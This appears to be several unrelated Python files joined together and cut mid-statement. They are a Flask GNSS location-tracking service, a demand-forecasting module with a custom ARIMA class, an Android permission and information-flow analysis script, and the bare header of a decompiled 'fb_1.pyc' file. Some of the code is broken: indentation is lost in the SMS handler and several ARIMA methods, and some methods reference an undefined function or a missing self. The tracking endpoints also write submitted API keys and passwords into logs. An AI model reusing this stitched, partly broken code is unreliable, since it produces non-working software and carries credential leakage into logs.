    current_app.logger.debug("gprmc = {}".format(gprmc))
    # parsing id to match GNSS Api
    haskey = ApiKey.query.filter_by(apikey=apicode).first()
    if haskey:
        user_id = haskey.user_id
        current_app.logger.info(
            "Found valid API code belonging to User ID = {}.".format(user_id)
        )
    else:
        # BUG FIX: the log message formatted the builtin `id` function instead of
        # the submitted API code.
        current_app.logger.info(
            "No user has such an API key = {}. Ignoring request then.".format(apicode)
        )
        return "Hello?"
    # code 0xF020 means OpenGTS location reporting
    if code == "0xF020":
        # parsing NMEA-0183 $GPRMC record
        gpsdata = parse_rmc(gprmc)
        current_app.logger.debug("parsed gprmc: {}".format(gpsdata))
        # checking tracks database for the data and device
        trackdb = Trackz.query.filter_by(
            trackdate=gpsdata["trackdate"], device=device
        ).first()
        if trackdb:
            current_app.logger.debug("trackdb: {}".format(trackdb))
        else:
            # we need to create a track
            trackdb = Trackz.create(
                name="OpenGTS",
                user_id=user_id,
                start=datetime.utcnow(),
                description="LiveTracking",
                device=device,
                trackdate=gpsdata["trackdate"],
                rid=uuid.uuid4(),
            )
            current_app.logger.debug("trackdb: {}".format(trackdb))
        # we have track id, now we must check if the location was not already
        # submitted, as it looks like opengts often tries to resubmit the same
        # points over and over again.
        points = Pointz.query.filter_by(
            track_id=trackdb.id,
            geom="SRID=4326;POINT({} {})".format(gpsdata["lon"], gpsdata["lat"]),
            timez=gpsdata["timez"],
        ).first()
        if not points:
            # uff, now we can finally submit location
            points = Pointz.create(
                track_id=trackdb.id,
                geom="SRID=4326;POINT({} {})".format(gpsdata["lon"], gpsdata["lat"]),
                altitude=alt,
                timez=gpsdata["timez"],
                speed=gpsdata["speed"],
                bearing=gpsdata["bearing"],
                comment="OpenGTS",
                sat=None,
                vdop=None,
                pdop=None,
                hdop=None,
                provider="gps",
            )
            # at the end we are updating the track table with current time
            current_app.logger.debug(points)
            trackdb.stop = datetime.utcnow()
            # BUG FIX: `db.session.commit` was a bare attribute access (no call),
            # so the stop timestamp was never committed.
            db.session.commit()
            db.session.close()
        else:
            current_app.logger.debug("We already have that point recorded. Thank you.")
    #
    return "OK"
@blueprint.route("/client/index.php", methods=["GET", "POST"])
@csrf_protect.exempt
def uloggerlogin():
    """μlogger client compatibility endpoint (auth / addtrack / addpos actions)."""
    current_app.logger.debug(request.get_data())
    if request.method == "POST":
        action = request.form["action"]
        if action == "auth":
            # username and password are the same at the moment
            # BUG FIX: this line was corrupted; the μlogger client sends
            # credentials in the "user"/"pass" form fields, and the password
            # doubles as the GNSS API key.
            password = request.form["pass"]
            username = request.form["user"]
            # parsing id to match GNSS Api
            haskey = ApiKey.query.filter_by(apikey=password).first()
            if haskey:
                user_id = haskey.user_id
                current_app.logger.info(
                    "Found valid API code belonging to User ID = {}.".format(user_id)
                )
                session["username"] = user_id
                # send a success to the app
                return jsonify(error=False)
            else:
                # BUG FIX: formatted the builtin `id` instead of the submitted key.
                current_app.logger.info(
                    "No user has such an API key = {}. Ignoring request then.".format(
                        password
                    )
                )
                # send error to the app as we do not have such a user
                return jsonify(error=True, message="go away")
        elif action == "addtrack":
            if "username" in session:
                username = session["username"]
            else:
                current_app.logger.info("Not logged in.")
                return jsonify(error=True, message="go away")
            # adding a new track
            trackname = request.form["track"]
            trackdb = Trackz.create(
                name=trackname,
                user_id=username,
                start=datetime.utcnow(),
                description="LiveTracking",
                device="μlogger",
                trackdate=datetime.utcnow(),
                rid=uuid.uuid4(),
            )
            current_app.logger.debug("trackdb: {}".format(trackdb))
            return jsonify(error=False, trackid=trackdb.id)
        elif action == "addpos":
            if "username" in session:
                username = session["username"]
            else:
                current_app.logger.info("Not logged in.")
                return jsonify(error=True, message="go away")
            # adding new point to existing track
            lat = request.form["lat"]
            lon = request.form["lon"]
            tstamp = datetime.fromtimestamp(int(request.form["time"]))
            trackid = request.form["trackid"]
            try:
                alti = request.form["altitude"]
            except Exception as e:
                alti = 0
                current_app.logger.debug(e)
            try:
                provider = request.form["provider"]
            except Exception as e:
                provider = "unknown"
                current_app.logger.debug(e)
            try:
                accu = request.form["accuracy"]
            except Exception as e:
                accu = "unknown"
                current_app.logger.debug(e)
            # we have track id, now we must check if the location was not already
            # submitted, as it looks like ulogger sometimes tries to resubmit the same
            # points over and over again.
            points = Pointz.query.filter_by(
                track_id=trackid,
                geom="SRID=4326;POINT({} {})".format(lon, lat),
                timez=tstamp,
            ).first()
            if not points:
                # uff, now we can finally submit location
                newpoint = Pointz.create(
                    track_id=trackid,
                    geom="SRID=4326;POINT({} {})".format(lon, lat),
                    altitude=alti,
                    timez=tstamp,
                    provider=provider,
                    comment=accu,
                    speed=0,
                    bearing=0,
                    hdop=0,
                    vdop=0,
                    pdop=0,
                    sat=0,
                )
                if newpoint:
                    current_app.logger.info("New point added: {}".format(newpoint))
                    return jsonify(error=False)
                else:
                    return jsonify(
                        error=True, message="problemz with adding, check the server."
                    )
            else:
                current_app.logger.info(
                    "This point is already added, ignoring: {}".format(points)
                )
                return jsonify(error=False)
        # BUG FIX: `db.session.commit` was missing the call parentheses.
        db.session.commit()
        db.session.close()
    # Robustness: non-POST requests and unknown actions previously returned None
    # (HTTP 500); answer with an explicit error instead.
    return jsonify(error=True, message="go away")
@blueprint.route("/mkr")
@csrf_protect.exempt
def mkr():
    """Receives data from Arduino receiver device, which is my another project.

    Mandatory query args: apikey, id (device), src ("gps" or "gsm"),
    da/mo/ye/ho/mi/se (timestamp parts), lat, lon.
    Optional: he (heading), alt (altitude), sp (speed), sat (satellites).
    """
    # mandatory values
    apicode = request.args.get("apikey")
    device = request.args.get("id")
    # src has two possible values: gps & gsm
    src = request.args.get("src")
    # Building datetime from URI
    gps_day = request.args.get("da")
    gps_month = request.args.get("mo")
    gps_year = request.args.get("ye")
    gps_minute = request.args.get("mi")
    gps_hour = request.args.get("ho")
    gps_second = request.args.get("se")
    gps_datetime_string = "{}-{}-{} {}:{}:{}".format(gps_day, gps_month, gps_year, gps_hour, gps_minute, gps_second)
    # NOTE(review): "%y" expects a two-digit year from the device -- confirm.
    gps_datetime = datetime.strptime(gps_datetime_string, "%d-%m-%y %H:%M:%S")
    gps_date = date(int(gps_year), int(gps_month), int(gps_day))
    if src == 'gps':
        # GPS source sends coordinates as integers scaled by 1e7
        lat = float(request.args.get("lat"))/10000000
        lon = float(request.args.get("lon"))/10000000
    else:
        lat = float(request.args.get("lat"))
        lon = float(request.args.get("lon"))
    # optional values:
    if request.args.get("he"):
        gps_head = request.args.get("he")
        if gps_head == "999999.000000":
            # device sentinel value meaning "no heading available"
            gps_head = None
    else:
        gps_head = None
    if request.args.get("alt"):
        gps_alt = request.args.get("alt")
    else:
        gps_alt = None
    if request.args.get("sp"):
        gps_speed = request.args.get("sp")
    else:
        gps_speed = None
    if request.args.get("sat"):
        gps_sat = request.args.get("sat")
    else:
        gps_sat = None
    # parsing id to match GNSS Api
    haskey = ApiKey.query.filter_by(apikey=apicode).first()
    if haskey:
        user_id = haskey.user_id
    else:
        # BUG FIX: formatted the builtin `id` function instead of the API code.
        current_app.logger.info(
            "No user has such an API key = {}. Ignoring request then.".format(apicode)
        )
        return "Hello?"
    # checking tracks database for the data and device
    trackdb = Trackz.query.filter_by(
        trackdate=gps_date, device=device
    ).first()
    if not trackdb:
        # we need to create a track
        trackdb = Trackz.create(
            name="Arduino",
            user_id=user_id,
            start=datetime.utcnow(),
            description="LiveTracking",
            device=device,
            trackdate=gps_date,
            rid=uuid.uuid4(),
        )
    # we have track id, now we must check if the location was not already
    # submitted, as it looks like the device often tries to resubmit the same
    # points over and over again.
    points = Pointz.query.filter_by(
        track_id=trackdb.id,
        geom="SRID=4326;POINT({} {})".format(lon, lat),
        timez=gps_datetime,
    ).first()
    if not points:
        # uff, now we can finally submit location
        points = Pointz.create(
            track_id=trackdb.id,
            geom="SRID=4326;POINT({} {})".format(lon, lat),
            altitude=gps_alt,
            timez=gps_datetime,
            speed=gps_speed,
            bearing=gps_head,
            comment=device,
            sat=gps_sat,
            vdop=None,
            pdop=None,
            hdop=None,
            provider=src
        )
        # at the end we are updating the track table with current time
        current_app.logger.debug(points)
        trackdb.stop = datetime.utcnow()
        # send pubsub to redis channel
        reddy = redis.Redis(host='localhost', port=6379, db=3)
        r = reddy.publish("{}".format(trackdb.rid), 'UP')
        current_app.logger.debug("redis publish on {}: {}".format(trackdb.rid, r))
        # closing db access
        # BUG FIX: `db.session.commit` was a bare attribute access (no call),
        # so the new point and stop timestamp were never committed.
        db.session.commit()
        db.session.close()
    else:
        current_app.logger.debug("We already have that point recorded. Thank you.")
    # we are done.
    return "OK"
@blueprint.route("/sms", methods=["POST"])
@csrf_protect.exempt
def smstext():
"""sms handling, we want to forward all text messagess to email."""
data = json.loads(request.data)
current_app.logger.debug(data)
# we can receive messages in UCS2 so we try to decode them
message = "{}".format( data['text'] )
messageclean = re.sub( '\W+','', data['text'] )
try:
czyucs = binascii.unhexlify(messageclean).decode('utf-16-be')
message += "\n\n"
message += czyucs
except Exception as e:
| |
<filename>afa/core.py
import traceback
import contextlib
import statsmodels.api as sm
import pandas as pd
import numpy as np
import time
from collections import OrderedDict
from concurrent import futures
from functools import partial
from tqdm.auto import tqdm
from scipy import signal, stats
from numpy import fft
from numpy.lib.stride_tricks import sliding_window_view
# Expected demand-export column layout (presumably the canonical input schema
# for this module -- confirm against callers outside this chunk).
EXP_COLS = ["timestamp", "channel", "family", "item_id", "demand"]
# Columns that together identify one time series.
GROUP_COLS = ["channel", "family", "item_id"]
# Metric names usable as optimization objectives.
OBJ_METRICS = ["smape_mean", "wape_mean"]
# these define how long a tail period is for each freq.
TAIL_LEN = {"D": 56, "W": 12, "W-MON": 12, "M": 3, "MS": 3}
# seasonal-decomposition period per pandas frequency string
DC_PERIODS = {"D": 365, "W": 7, "W-MON": 7, "M": 12, "MS": 12}
#
# Forecast functions
#
def forecaster(func):
    """Forecast function decorator. Apply this to any forecasting function and
    it will handle any compulsory pre- and post-processing of arguments and
    return values.

    The wrapped function is called as ``func(y, horiz, **kwargs)`` and must
    return an array of length ``horiz``.

    Recognized keyword options (read from ``kwargs``):
      local_model -- fit only on the trailing ``TAIL_LEN[freq]`` observations
      seasonal    -- forecast via a pre-computed decomposition ``dc``
      trim_zeros  -- drop leading zeros from the history
      use_log     -- model on the log1p scale, invert afterwards
      dc          -- (resid, trend, seasonal_forecast) triple for ``seasonal``
    """
    def do_forecast(y, horiz, freq, **kwargs):
        assert horiz > 0
        local_model = kwargs.get("local_model", False)
        seasonal = kwargs.get("seasonal", False)
        trim_zeros = kwargs.get("trim_zeros", False)
        use_log = kwargs.get("use_log", False)
        dc = kwargs.get("dc", None)

        if trim_zeros:
            y = np.trim_zeros(y, trim="f")
        if use_log:
            y = np.log1p(y)
        if local_model:
            y = y[-TAIL_LEN[freq]:]
        # guard against a degenerate one-point history
        if len(y) == 1:
            y = np.pad(y, [1, 0], constant_values=1)
        y = np.nan_to_num(y)

        # forecast via seasonal decomposition
        if seasonal:
            if dc is None:
                yp = np.zeros(horiz)
            else:
                period = DC_PERIODS[freq]
                if len(y) < 2 * period:
                    period = int(len(y) / 2)
                kwargs.pop("seasonal")
                resid, trend, yp_seasonal = dc
                # forecast trend and residual components separately and
                # recombine with the pre-computed seasonal forecast
                yp_trend = func(np.nan_to_num(trend), horiz, **kwargs)
                yp_resid = func(np.nan_to_num(resid), horiz, **kwargs)
                yp = yp_seasonal + yp_trend + yp_resid
        else:
            # ensure the input values are not null
            yp = func(y, horiz, **kwargs)

        # de-normalize from log-scale
        if use_log:
            # BUGFIX: the forward transform is log1p, so the inverse must be
            # expm1 -- plain exp() left every forecast inflated by one unit.
            yp = np.expm1(yp)

        yp = np.nan_to_num(yp).clip(0).round(0)
        assert len(yp) == horiz
        return yp
    return do_forecast
@forecaster
def exsmooth(y, horiz, **kwargs):
    """Simple exponential smoothing; the forecast is flat beyond the history.

    ``alpha`` (kwarg, default 0.2) is the smoothing factor.
    """
    alpha = kwargs.get("alpha", 0.2)
    # drop leading zeros, but only for reasonably long histories
    if len(y) > 8:
        y = np.trim_zeros(y, trim='f')
    if len(y) == 0:
        y = np.zeros(1)
    smooth = [y[0]]
    # one-step smoothed values over the history; the final observation is
    # excluded, matching the original recursion bounds
    for obs in y[1:len(y) - 1]:
        smooth.append(alpha * obs + (1 - alpha) * smooth[-1])
    # flat extrapolation over the extra periods
    smooth.extend([smooth[-1]] * (horiz - 1))
    return np.clip(np.array(smooth[-horiz:]), 0, None)
@forecaster
def holt(y, horiz, **kwargs):
    """Holt's linear (double exponential) smoothing forecast.

    ``alpha`` smooths the level, ``beta`` the trend (both default 0.2).
    Requires at least two observations to initialize the trend.
    """
    alpha = kwargs.get("alpha", 0.2)
    beta = kwargs.get("beta", 0.2)
    fcst = [np.nan]           # first one-step forecast is undefined
    level = [y[0]]            # level starts at the first observation
    slope = [y[1] - y[0]]     # trend starts at the first difference
    # run the smoothing recursion over the observed history
    for obs in y[1:]:
        one_ahead = level[-1] + slope[-1]
        fcst.append(one_ahead)
        level.append(alpha * obs + (1 - alpha) * one_ahead)
        slope.append(beta * (level[-1] - level[-2]) + (1 - beta) * slope[-1])
    # extrapolate: level absorbs the forecast, trend is held constant
    for _ in range(horiz - 1):
        fcst.append(level[-1] + slope[-1])
        level.append(fcst[-1])
        slope.append(slope[-1])
    return np.array(fcst[-horiz:])
@forecaster
def fourier(y, horiz, n_harm=15, **kwargs):
    """Generate a forecast using Fourier extrapolation.

    The series is linearly detrended, the lowest-frequency ``n_harm``
    harmonics of its FFT are kept, and the restored signal plus trend is
    extended ``horiz`` steps past the end of the history.

    Parameters
    ----------
    n_harm : int
        Number of harmonics in the model

    Results
    -------
    yp : array_like
        Forecast of length ``horiz``; zeros if the computation fails.
    """
    try:
        n = y.shape[0]
        t = np.arange(n)
        p = np.polyfit(t, y, 1)  # find linear trend in x
        f = fft.fftfreq(n)  # frequencies
        y_detrended = y - p[0] * t  # detrended x
        y_freqdom = fft.fft(y_detrended)  # detrended x in frequency domain
        indices = list(range(n))
        # sort indices by frequency, lower -> higher
        indices.sort(key=lambda i: np.absolute(f[i]))
        t = np.arange(n + horiz)
        restored_sig = np.zeros(t.size)
        for i in indices[:2 + n_harm * 2]:
            amp = np.absolute(y_freqdom[i]) / n  # amplitude
            phase = np.angle(y_freqdom[i])  # phase
            restored_sig += amp * np.cos(2 * np.pi * f[i] * t + phase)
        yp = (restored_sig + p[0] * t)[-horiz:]
    except Exception:
        # BUGFIX: narrowed from a bare ``except:`` so KeyboardInterrupt and
        # SystemExit are not swallowed; numerical failures fall back to zeros.
        traceback.print_exc()
        yp = np.zeros(horiz)
    return yp
@forecaster
def naive(y, horiz, **kwargs):
    """Mean forecast: repeat the historical mean across the horizon."""
    flat = np.full(horiz, y.mean())
    return np.clip(flat, 0, None).round(0)
@forecaster
def trend(y, horiz, **kwargs):
    """Generate a forecast using a linear trend model.

    Fits a degree-1 polynomial to the mean-normalized history and
    extrapolates it ``horiz`` steps; an all-zero (or negative-sum) history
    falls back to a flat mean forecast.

    Parameters
    ----------
    y : array_like
    horiz : int

    Returns
    -------
    yp : np.array
    """
    if y.sum() > 0:
        xs = np.arange(y.size)
        # normalize by the mean so the fit is scale-free
        scale = np.nanmean(y)
        line = np.poly1d(np.polyfit(xs, y / scale, 1))
        future = np.arange(y.size, y.size + horiz)
        return line(future) * scale
    return y.mean() * np.ones(horiz)
@forecaster
def arima(y, horiz, q=1, d=0, p=1, **kwargs):
    """Forecast with the hand-rolled ARIMA model defined below.

    Parameters
    ----------
    q, d, p : int
        MA order, differencing order and AR order.

    Returns
    -------
    yp : np.array
        Rounded forecast of length ``horiz``; zeros if fitting fails.
    """
    try:
        m = ARIMA(q, d, p)
        # fit_predict fits the coefficients (its in-sample prediction was
        # previously assigned and immediately overwritten -- dead code removed)
        m.fit_predict(y)
        pred = m.forecast(y, horiz)
        yp = np.round(pred[-horiz:], 0)
    except Exception:
        # BUGFIX: narrowed from a bare ``except:``
        traceback.print_exc()
        yp = np.zeros(horiz)
    return yp
#
# ARIMA classes
#
class LinearModel:
    """Ordinary least-squares linear regression solved via the pseudo-inverse."""

    def __init__(self, fit_intercept=True):
        self.fit_intercept = fit_intercept
        self.beta = None        # full coefficient vector (intercept first, if any)
        self.intercept_ = None
        self.coef_ = None

    def _prepare_features(self, x):
        """Prepend a column of ones when an intercept is being fitted."""
        if not self.fit_intercept:
            return x
        ones = np.ones((x.shape[0], 1))
        return np.hstack((ones, x))

    def _least_squares(self, x, y):
        """Solve the normal equations; pinv keeps this stable for singular X'X."""
        gram = x.T @ x
        return np.linalg.pinv(gram) @ (x.T @ y)

    def fit(self, x, y):
        """Estimate coefficients from feature matrix ``x`` and targets ``y``."""
        design = self._prepare_features(x)
        self.beta = self._least_squares(design, y)
        if self.fit_intercept:
            self.intercept_, self.coef_ = self.beta[0], self.beta[1:]
        else:
            self.coef_ = self.beta

    def predict(self, x):
        """Return predictions for feature matrix ``x``."""
        return self._prepare_features(x) @ self.beta

    def fit_predict(self, x, y):
        """Fit on ``(x, y)`` and return the in-sample predictions."""
        self.fit(x, y)
        return self.predict(x)
class ARIMA(LinearModel):
    def __init__(self, q, d, p):
        """
        An ARIMA(p, d, q) model.
        :param q: (int) Order of the MA model.
        :param p: (int) Order of the AR model.
        :param d: (int) Number of times the data needs to be differenced.
        """
        super().__init__(True)  # the LinearModel base always fits an intercept here
        self.p = p
        self.d = d
        self.q = q
        # helper AR model used to estimate residuals for the MA terms
        self.ar = None
        # residuals of the AR fit; read in prepare_features -- assigned by code
        # not visible in this chunk (TODO confirm where it is set)
        self.resid = None
    def _lag_view(self, x, order):
        """
        For every value X_i create a row that lags k values: [X_i-1, X_i-2, ... X_i-k]

        Returns a (features, labels) pair: features[t] holds the ``order``
        values preceding labels[t] = x[t + order].
        """
        y = x.copy()
        # Create features by shifting the window of `order` size by one step.
        # This results in a 2D array [[t1, t2, t3], [t2, t3, t4], ... [t_k-2, t_k-1, t_k]]
        x = np.array([y[-(i + order):][:order] for i in range(y.shape[0])])
        # Reverse the array as we started at the end and remove duplicates.
        # Note that we truncate the features [order -1:] and the labels [order]
        # This is the shifting of the features with one time step compared to the labels
        x = np.stack(x)[::-1][order - 1: -1]
        y = y[order:]
        return x, y
def _difference(self, x, d=1):
if d == 0:
return x
else:
x = np.r_[x[0], np.diff(x)]
return self._difference(x, d - 1)
def _undo_difference(x, d=1):
if d == 1:
return np.cumsum(x)
else:
x = np.cumsum(x)
return self._undo_difference(x, d - 1)
def prepare_features(self, x):
if self.d > 0:
x = difference(x, self.d)
ar_features = None
ma_features = None
# Determine the features and the epsilon terms for the MA process
if self.q > 0:
if self.ar is None:
self.ar = ARIMA(0, 0, self.p)
self.ar.fit_predict(x)
eps = self.ar.resid
eps[0] = 0
# prepend with zeros as there are no residuals_t-k in the first X_t
ma_features, _ = self._lag_view(np.r_[np.zeros(self.q), eps], self.q)
# Determine the features for the AR process
if self.p > 0:
# prepend with zeros as there are no X_t-k in the first X_t
ar_features = self._lag_view(np.r_[np.zeros(self.p), x], self.p)[0]
if ar_features is not None and ma_features is not None:
n = min(len(ar_features), len(ma_features))
ar_features = ar_features[:n]
ma_features = ma_features[:n]
features = np.hstack((ar_features, ma_features))
elif ma_features is not None:
n = len(ma_features)
features = ma_features[:n]
else:
n = len(ar_features)
features = ar_features[:n]
return features, x[:n]
    def fit(self, x):
        """Fit the ARIMA coefficients to series ``x`` via least squares.

        Returns the prepared design matrix so callers (``fit_predict``) can
        reuse it for in-sample prediction.
        """
        features, x = self.prepare_features(x)
        super().fit(features, x)
        return features
def fit_predict(self, x):
"""
Fit and transform input
:param x: (array) with time series.
"""
features = self.fit(x)
return self.predict(x, prepared=(features))
def predict(self, x, **kwargs):
"""
:param x: (array)
:kwargs:
prepared: (tpl) containing the features, eps and x
"""
features = kwargs.get('prepared', None)
if features is None:
features, | |
# coding=utf-8
import json
import luigi
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import matplotlib.colors as colors
import numpy as np
import os
import pandas as pd
import seaborn as sns
import sys
sys.path.append("..")
import cfg
from constants import DANGEROUS_GROUPS
from collections import defaultdict
def get_label_src(label):
    ''' returns the flow source label '''
    src, _sep, _rest = label.partition(' - ')
    return src
def get_label_sink(label):
    ''' returns the flow sink label '''
    # second ' - '-separated field (split, not partition, so multiple
    # separators keep the original behavior)
    parts = label.split(' - ')
    return parts[1]
def get_base_src(label):
    ''' returns the base name of flow source (without lib location) '''
    # source half of the label, with the ':<lib location>' suffix stripped
    src_label = label.split(' - ')[0]
    return src_label.split(':')[0].strip()
def get_base_sink(label):
    ''' get base name of sink (without lib location) '''
    # sink half of the label, with the ':<lib location>' suffix stripped
    sink_label = label.split(' - ')[1]
    return sink_label.split(':')[0].strip()
def read_json_matrix(matrix_folder, pkg):
    ''' reads matrix and its labels from a json file and returns them;
    None when the matrix json file is missing '''
    m_file = os.path.join(matrix_folder, pkg, pkg + '.json')
    if not os.path.exists(m_file):
        return None
    with open(m_file) as data_file:
        data = json.load(data_file)
    return {
        'm': np.array(data['m']),   # the matrix itself
        'l': data['yl'],            # row labels
        'v': data['xl'],            # versions (column labels)
    }
def read_app_info(pkg):
    """Stub -- intentionally unimplemented; always returns None."""
    pass
# returns the indexes (flow, version) where new flows appear
def get_new_flow_indexes(flow_data):
    """Return (flow_row, version_col) pairs where a flow newly appears,
    i.e. its status turns positive after last being 0. Negative cells are
    treated as unknown and do not update the tracked previous status."""
    matrix = flow_data['m']
    n_flows = len(flow_data['l'])
    n_versions = len(flow_data['v'])
    indexes = []
    for row in range(n_flows):
        prev_status = 0
        for col in range(n_versions):
            status = matrix[row][col]
            if status > 0 and prev_status == 0:
                indexes.append((row, col))
            if status >= 0:
                prev_status = status
    return indexes
def get_perm_group(perm):
    """Return the dangerous-permission group containing ``perm``,
    or None when it belongs to no group."""
    for group, perms in DANGEROUS_GROUPS.items():
        if perm in perms:
            return group
    return None
def is_perm_automatically_granted(perm_matrix, perm_labels, version, perm):
    """ return true if a permission would be automatically granted for a
    specific version """
    # retrieve permission group
    group = get_perm_group(perm)
    # granted automatically when any *other* tracked permission of the same
    # group was held in both the previous and the current version
    for sibling in DANGEROUS_GROUPS[group]:
        if sibling == perm or sibling not in perm_labels:
            continue
        idx = perm_labels.index(sibling)
        if perm_matrix[idx][version] > 0 and perm_matrix[idx][version - 1]:
            return True
    return False
def check_perm(perm_matrix, perm_labels, version_index, perm):
    """ returns the status of a permission: 'N' newly asked, 'G' newly asked
    and auto-granted, 'A' already asked, 'R' revoked, 'M' missing """
    if perm not in perm_labels:
        return 'M'  # permission is not tracked at all
    row = perm_matrix[perm_labels.index(perm)]
    if row[version_index] == 0:
        # revoked only if it was actually held in the previous version
        if version_index > 0 and row[version_index - 1] > 0:
            return 'R'
        return 'M'
    if version_index == 0:
        return 'N'  # asked from the very first version
    if row[version_index - 1] == 0:
        if is_perm_automatically_granted(perm_matrix, perm_labels,
                                         version_index, perm):
            return 'G'
        return 'N'
    return 'A'  # held in both previous and current version
def is_layout_changed(version, layout_data):
    """ returns True if layout matrix changed or added is not zero """
    # layout matrix has one less column than the flow ones, because
    # it compares 2 versions. if version is zero, we assume no changes
    # in the layout
    if version == 0:
        return True
    added_row = layout_data['l'].index('ui_added')
    return bool(layout_data['m'][added_row][version - 1] > 0)
def get_list_perm_status(pm, pl, ver, perms_list):
    """Aggregate the status of a flow guarded by several permissions
    (e.g. the SMS flow checks READ_SMS, RECEIVE_SMS and RECEIVE_MMS;
    location and storage flows pass their own lists).

    Codes: 'N' newly asked, 'G' newly asked + auto-granted, 'A' already
    asked, 'R' revoked, 'M' missing, 'S' mixed newly-asked/revoked,
    'E' unexpected combination. Branch ORDER below is significant.
    """
    status_list = []
    for p in perms_list:
        p_status = check_perm(pm, pl, ver, p)
        status_list.append(p_status)
        # if permission is ACCESS_FINE_LOCATION and it is
        # newly granted, return N independently of
        # ACCESS_COARSE_LOCATION permission status
        if p == 'ACCESS_FINE_LOCATION' and (p_status in ['N', 'G']):
            return p_status
    # if all elements are the same return that element
    if status_list.count(status_list[0]) == len(status_list):
        return status_list[0]
    # if we have only revoked and missing, return revoked
    elif ('R' in status_list and 'M' in status_list and 'G' not in status_list
          and 'N' not in status_list and 'A' not in status_list):
        return 'R'
    # if we have only newly added and missing, return newly added
    elif ('R' not in status_list and 'M' in status_list and
          ('N' in status_list or 'G' in status_list) and 'A' not in status_list):
        if 'G' in status_list:
            return 'G'
        else:
            return 'N'
    # if a permission was already asked and still is, return already asked
    elif 'A' in status_list:
        return 'A'
    # else we are in a special case: both newly asked and revoked permissions
    # and no already asked: return special case
    elif (('N' in status_list or 'G' in status_list) and
          'R' in status_list and not 'A' in status_list):
        return 'S'
    # else there is some error: return E
    else:
        return 'E'
def get_flow_perm_status(ind, perm_data, labels):
    """ returns the permission status of the input flow; '?' when the
    permission matrix file is missing and '-' when the flow's source
    needs no tracked permission """
    if perm_data is None:
        return '?'
    pm = perm_data['m']
    pl = perm_data['l']
    ver = ind[1]
    src = get_base_src(labels[ind[0]])
    # sources whose status aggregates a list of related permissions
    grouped_perms = {
        'ACCESS_LOCATION': ['ACCESS_FINE_LOCATION', 'ACCESS_COARSE_LOCATION'],
        'READ_EXTERNAL_STORAGE': ['READ_EXTERNAL_STORAGE',
                                  'WRITE_EXTERNAL_STORAGE'],
        'RECEIVE_SMS': ['READ_SMS', 'RECEIVE_SMS', 'RECEIVE_MMS'],
    }
    # sources checked against a single permission
    single_perms = {
        'READ_CONTACTS': 'READ_CONTACTS',
        'READ_PHONE_STATE': 'READ_PHONE_STATE',
        'RECORD_AUDIO': 'RECORD_AUDIO',
        'GET_ACCOUNTS': 'GET_ACCOUNTS',
    }
    if src in grouped_perms:
        return get_list_perm_status(pm, pl, ver, grouped_perms[src])
    if src in single_perms:
        return check_perm(pm, pl, ver, single_perms[src])
    return '-'
def flow_analysis(pkg):
    """Run the flow/permission/layout analysis for package ``pkg``.

    Loads the flow, permission and layout matrices, determines the
    permission and layout status of every newly-appearing information flow,
    renders a heatmap to disk, and returns the list of human-readable
    status rows -- or None when inputs are missing or inconsistent.
    """
    # read flow matrix
    flow_data = read_json_matrix(cfg.flow_appflow_matrix_folder, pkg)
    labels = flow_data['l']
    versions = flow_data['v']
    flow_matrix = flow_data['m']
    # read permission matrix
    perm_data = read_json_matrix(cfg.info_permission_matrix_folder, pkg)
    if perm_data is None:
        # printed 5x so it stands out in a noisy batch log
        for i in range(0, 5):
            print('<<<<<<<<<< PERM_DATA is None >>>>>>>>>>')
        return None
    # if the shape of matrices differs there is a problem with versions
    # if not flow_matrix.shape[1] == perm_data['m'].shape[1]:
    if perm_data is not None and not len(versions) == len(perm_data['v']):
        for i in range(0, 5):
            print('<<<<<<<<<< MATRIX SHAPE DIFFERS >>>>>>>>>>')
            print('flow has %d versions, perm_data has %d' % (len(versions),
                                                              len(perm_data['v'])))
        return None
    # read layout matrix
    layout_data = read_json_matrix(cfg.apktool_ui_matrix_folder, pkg)
    flow_indexes = get_new_flow_indexes(flow_data)
    flow_perm_status = []
    # create analysis matrix, color all cells with an info flow
    analysis_matrix = np.zeros(flow_matrix.shape)
    for i in range(0, analysis_matrix.shape[0]):
        for j in range(0, analysis_matrix.shape[1]):
            val = 1 if flow_matrix[i][j] > 0 else flow_matrix[i][j]
            analysis_matrix[i][j] = val
    # NOTE(review): dtype='string' is the legacy NumPy-on-Python-2 alias and
    # raises TypeError on modern NumPy -- confirm intended runtime before
    # porting (would be dtype=object or '<U1').
    character_matrix = np.empty(flow_matrix.shape, dtype='string')
    for i in range(0, character_matrix.shape[0]):
        for j in range(0, character_matrix.shape[1]):
            character_matrix[i][j] = ''
    # for each flow, update the analysis and character matrix
    # to build the analysis heatmap
    for ind in flow_indexes:
        label = labels[ind[0]]
        ver = versions[ind[1]]
        # get permission status when a new flow appears
        perm_status = get_flow_perm_status(ind, perm_data, labels)
        character_matrix[ind[0]][ind[1]] = perm_status
        # get layout status
        if layout_data is None:
            layout_changed = '?'
        else:
            layout_changed = 'T' if is_layout_changed(ind[1], layout_data) else 'F'
        layout_val_mapping = {'T': 1, '?': 2, 'F': 3}
        analysis_matrix[ind[0]][ind[1]] = layout_val_mapping[layout_changed]
        # create row for new flow
        row = '%s | %s (%s) %s' % (label, ver, perm_status, layout_changed)
        flow_perm_status.append(row)
        # analyze permission status until the end of the flow, and
        # only record newly added or revoked statuses
        for i in range(ind[1] + 1, len(versions)):
            if not flow_matrix[ind[0]][i] > 0:
                break
            perm_status = get_flow_perm_status((ind[0], i), perm_data, labels)
            if perm_status not in ['A', 'M', '-']:
                character_matrix[ind[0]][i] = perm_status
    # create heatmap folder if missing
    # TODO make heatmap the output of the luigi task
    if not os.path.exists(cfg.analysis_flow_heatmap_folder):
        os.makedirs(cfg.analysis_flow_heatmap_folder)
    create_heatmap(analysis_matrix, labels, versions, character_matrix, pkg)
    return flow_perm_status
def create_heatmap(data, row_labels, col_labels, char_matrix, pkg):
""" creates the heatmap of permission use and saves it to a file """
# seaborn
dpi = 72.27
fontsize_x_pt = 8
fontsize_y_pt = 10
# comput the matrix height in points and inches
matrix_height_pt = fontsize_y_pt * data.shape[0]
matrix_height_in = matrix_height_pt / dpi
matrix_width_pt = fontsize_x_pt * data.shape[1]
matrix_width_in = matrix_width_pt / dpi
# compute the required figure height
top_margin = 0.04 # in percentage of the figure height
bottom_margin = 0.04 # in percentage of the figure height
coeff = 2
figure_height = | |
# Decompiled by HTR-TECH | <NAME>
# Github : https://github.com/htr-tech
#---------------------------------------
# Auto Dis Parser 2.2.0
# Source File : fb_1.pyc
# Bytecode Version : 2.7
# Time : Sun Aug 9 11:47:46 2020
#---------------------------------------
import os
import sys
